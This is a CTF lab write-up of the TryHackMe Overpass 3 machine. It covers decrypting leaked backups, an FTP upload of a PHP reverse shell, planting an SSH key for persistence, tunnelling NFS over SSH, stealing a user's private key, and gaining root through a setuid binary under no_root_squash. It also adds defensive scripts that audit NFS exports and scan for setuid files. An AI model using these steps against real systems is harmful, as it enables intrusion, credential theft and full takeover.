TryHackMe - Overpass 3 - Hosting
This is the third, and last, installment in the overpass series on TryHackMe. I did part 1, and part 2, though I never wrote up how I did part 2. I don't know if I'll go back and write that one up or not.
Ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.37 ((centos))
Service Info: OS: Unix
Port 80
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://$IP
backups.zip contains a file encrypted with GNU Privacy Guard, but also the private key needed to decrypt it.
gpg --import priv.key
gpg --decrypt CustomerDetails.xlsx.gpg > CustomerDetails.xlsx
The CustomerDetails.xlsx has a list of usernames and passwords.
Port 21
With the credentials we found in backups.zip, let's try FTP:
As paradox:
150 Here comes the directory listing.
drwxr-xr-x 2 48 48 24 Nov 08 2020 backups
-rw-r--r-- 1 0 0 65591 Nov 17 2020 hallway.jpg
-rw-r--r-- 1 0 0 1770 Nov 17 2020 index.html
-rw-r--r-- 1 0 0 576 Nov 17 2020 main.css
-rw-r--r-- 1 0 0 2511 Nov 17 2020 overpass.svg
This user can upload files, including PHP, verified first with a minimal test page:
<?php phpinfo(); ?>
Port 22
We can't just ssh to the box (yet), even with a username and password, because it only accepts key authentication:
➜ overpass3hosting git:(main) ✗ ssh paradox@$IP
paradox@10.10.40.32: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
Initial Shell
Upload a php reverse shell via FTP and listen for the callback:
listening on [any] 4444 ...
10.10.22.22: inverse host lookup failed: Unknown host
connect to [10.2.7.89] from (UNKNOWN) [10.10.22.22] 59194
Linux ip-10-10-22-22 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
06:34:55 up 46 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh-4.4$ uname -a
uname -a
Linux ip-10-10-22-22 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
CentOS Linux release 8.2.2004 (Core)
Oh, neato, an NFS export with no_root_squash. With this, root on a remote client accesses the files on the server as root! Read more here.
Connected NFS Mounts:
nfsd /proc/fs/nfsd nfsd rw,relatime 0 0
sunrpc /var/lib/nfs/rpc_pipefs rpc_pipefs rw,relatime 0 0
-rw-r--r--. 1 root root 54 Nov 18 2020 /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
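An added check that is not part of the original writeup: a small parser for /etc/exports that flags the options that made this export dangerous (no_root_squash, insecure, and a wildcard rw client). The sample exports text is constructed; its second line shows what a hardened entry would look like.

```python
from typing import Dict, List

# Constructed sample, not copied from a real system: the first export mirrors
# the options seen on the target, the second is a hardened equivalent.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed example)
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
/srv/pub    10.10.0.0/16(ro,sync,root_squash,secure)
"""

def parse_exports(text: str) -> List[Dict]:
    """One record per client entry: path, client, and its option list."""
    records = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        for token in clients:
            # Entries look like client(opt,opt,...); a bare client gets the defaults.
            if "(" in token:
                client, opts = token.split("(", 1)
                options = [o.strip() for o in opts.rstrip(")").split(",") if o.strip()]
            else:
                client, options = token, []
            records.append({"path": path, "client": client, "options": options})
    return records

def audit_exports(text: str) -> List[str]:
    """Flag the settings that let a remote client act as root on the server."""
    findings = []
    for rec in parse_exports(text):
        where = f"{rec['path']} -> {rec['client']}"
        opts = set(rec["options"])
        # Default is root_squash: uid 0 on the client is mapped to nobody on the server.
        if "no_root_squash" in opts:
            findings.append(f"{where}: no_root_squash lets a root client create root-owned setuid files")
        # Default is secure: requests must come from a port below 1024, i.e. from root on the client.
        if "insecure" in opts:
            findings.append(f"{where}: insecure accepts requests from unprivileged source ports")
        if rec["client"] == "*" and "rw" in opts:
            findings.append(f"{where}: writable by any host that can reach the NFS ports")
    return findings

if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(finding)
```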
web.flag
The first flag was sitting in /usr/share/httpd, probably because with the shell we are apache at the moment.
cd ~
sh-4.4$ pwd
/usr/share/httpd
pwd
sh-4.4$ ls
ls
error
icons
noindex
web.flag
sh-4.4$ cat web.flag
cat web.flag
thm{********************************}
Persistence
Ok, the apache user is pretty limited, let's see if we can switch to paradox using the same password we found earlier:
listening on [any] 4444 ...
10.10.40.32: inverse host lookup failed: Unknown host
connect to [10.2.7.89] from (UNKNOWN) [10.10.40.32] 34748
Linux ip-10-10-40-32 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
17:21:10 up 6 min, 0 users, load average: 0.00, 0.15, 0.10
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: cannot set terminal process group (889): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4$ /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'
/usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'
bash-4.4$ su paradox
su paradox
Password: *****************
[paradox@ip-10-10-40-32 /]$ cd ~
icd ~
[paradox@ip-10-10-40-32 ~]$ d
id
uid=1001(paradox) gid=1001(paradox) groups=1001(paradox)
Nice. We couldn't ssh to the box as that user before because they're configured to only allow ssh with a key, not a password. So let's add a key of ours to authorized_keys so we can just ssh in as paradox from here on.
echo 'ssh-rsa AAAAB3N ... blah blah redacted' >> ~/.ssh/authorized_keys
NFS
The nfs ports, 111 and 2049, show up as filtered on an nmap scan, so we cannot directly mount the exported filesystem. But now that we can use ssh as paradox, we can just forward the ports!
Attacker
ssh -i id_rsa -N -L 10.2.7.89:2049:$IP:2049 -L 10.2.7.89:111:$IP:111 paradox@10.10.22.22
user.flag
Now we can mount the exported path locally and read/write at will.
Attacker: mount the remote path via nfs, but use our IP address because we are tunneling
➜ overpass3hosting git:(main) ✗ sudo mount -t nfs 10.2.7.89: ./james
[sudo] password for beamjack:
➜ overpass3hosting git:(main) ✗ cd james
➜ james ls -la
total 20
drwx------ 3 beamjack beamjack 112 Nov 17 2020 .
drwxr-xr-x 3 beamjack beamjack 4096 Oct 23 00:18 ..
lrwxrwxrwx 1 root root 9 Nov 8 2020 .bash_history -> /dev/null
-rw-r--r-- 1 beamjack beamjack 18 Nov 8 2019 .bash_logout
-rw-r--r-- 1 beamjack beamjack 141 Nov 8 2019 .bash_profile
-rw-r--r-- 1 beamjack beamjack 312 Nov 8 2019 .bashrc
drwx------ 2 beamjack beamjack 61 Nov 7 2020 .ssh
-rw------- 1 beamjack beamjack 38 Nov 17 2020 user.flag
➜ james cat user.flag
thm{********************************}
We can similarly steal james' keys for ssh:
➜ james cp .ssh/id_rsa ../james_rsa
➜ james cd ..
➜ overpass3hosting git:(main) ✗ ssh -i james_rsa james@$IP
Last login: Wed Nov 18 18:26:00 2020 from 192.168.170.145
[james@ip-10-10-40-32 ~]$ id
uid=1000(james) gid=1000(james) groups=1000(james)
root.flag
Remember that no_root_squash flag on the export? Well that means if we are root on the machine that mounts the export, we can write things as root in that mounted filesystem. We could put our own binary there and setuid it, but let's just use a binary already on the target since we just want to grab the flag. We could try bash, but I'm fairly sure that bash will drop its effective user to unprivileged, and we just want to grab the flag for a CTF. How about we setuid cat and then run it on the target box?
Target: As james, copy the local cat binary to this directory
[james@ip-10-10-40-32 ~]$ cp /usr/bin/cat .
Attacker: with the target filesystem mounted, chown and chmod the binary as root (yes, root on our attacker system, remember no_root_squash)
➜ james sudo chown root ./cat
➜ james ls -la ./cat
-rwxr-xr-x 1 root beamjack 87496 Oct 23 10:37 cat
➜ james sudo chmod u+s ./cat
➜ james ls -la ./cat
-rwsr-xr-x 1 root beamjack 87496 Oct 23 10:37 ./cat
Target: run the binary that has setuid so it runs with root privileges
[james@ip-10-10-40-32 ~]$ ./cat /root/root.flag
thm{********************************}
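As an added detection example, not from the original writeup: the trick above leaves a root-owned setuid file in a home directory, which a periodic scan of exported paths on the server can catch. The scan walks a tree with lstat (so a symlink to a real setuid binary is not counted) and reports each setuid/setgid regular file with its owner; demo() runs it on a constructed temporary directory.

```python
import os
import shutil
import stat
import tempfile
from typing import Dict, List

def find_setuid_files(root: str) -> List[Dict]:
    """Walk `root` and report every regular file with the setuid or setgid bit set.
    Symlinks are inspected with lstat, so a link to /usr/bin/passwd is not a hit."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            suid = bool(st.st_mode & stat.S_ISUID)
            sgid = bool(st.st_mode & stat.S_ISGID)
            if suid or sgid:
                hits.append({"path": path, "uid": st.st_uid, "gid": st.st_gid,
                             "setuid": suid, "setgid": sgid,
                             "root_owned": st.st_uid == 0})
    return hits

def planted_root_binaries(root: str) -> List[str]:
    """The pattern from this box: a root-owned setuid file sitting under a home directory."""
    return [h["path"] for h in find_setuid_files(root) if h["setuid"] and h["root_owned"]]

def demo() -> List[Dict]:
    """Run the scan on a constructed directory: one setuid file, one plain file, one symlink."""
    d = tempfile.mkdtemp()
    try:
        planted = os.path.join(d, "cat")
        with open(planted, "wb") as fh:
            fh.write(b"\x7fELF")            # placeholder bytes, not a real binary
        os.chmod(planted, 0o4755)           # the mode chmod u+s produced in the writeup
        with open(os.path.join(d, "user.flag"), "w") as fh:
            fh.write("thm{constructed}\n")
        os.symlink("/dev/null", os.path.join(d, ".bash_history"))
        # Paths are made relative so the result does not depend on the temp location.
        return [dict(h, path=os.path.relpath(h["path"], d)) for h in find_setuid_files(d)]
    finally:
        shutil.rmtree(d)

if __name__ == "__main__":
    print(demo())
```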